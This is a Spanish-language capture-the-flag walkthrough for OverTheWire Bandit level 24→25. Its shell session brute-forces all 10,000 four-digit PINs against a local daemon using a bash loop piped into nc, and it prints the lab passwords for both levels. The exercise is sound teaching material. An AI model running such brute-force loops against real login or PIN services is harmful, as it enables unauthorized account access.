# Bandit 24 → Level 25

## Objetivo
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

## Datos de acceso
Usuario: **bandit24**
Password: **VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar**

## Solución
```bash
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
Fail! You did not supply enough data. Try again.
^C
bandit24@bandit:~$ echo {0000.0005}
{0000.0005}
bandit24@bandit:~$ echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar {0000..0005}:
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0000: 0001: 0002: 0003: 0004: 0005:
bandit24@bandit:~$ for i in {0000..0005}: do echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i: done
>
> ^C
bandit24@bandit:~$ for i in {0000..0005}: do echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i; done
-bash: syntax error near unexpected token done
bandit24@bandit:~$ for i in {0000..0005}; do echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i; done
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0000
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0004
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0005
bandit24@bandit:~$ for i in {0000..0005}; do echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i; done | nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
^C
bandit24@bandit:~$ for i in {0000..9999}; do echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i; done | nc localhost 30002| grep -v Wrong!
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d

Exiting.
bandit24@bandit:~$
```

## Notas adicionales
El -v del grep lo que hace es que no nos muestra lo que pongamos a continuación.
## Referencias

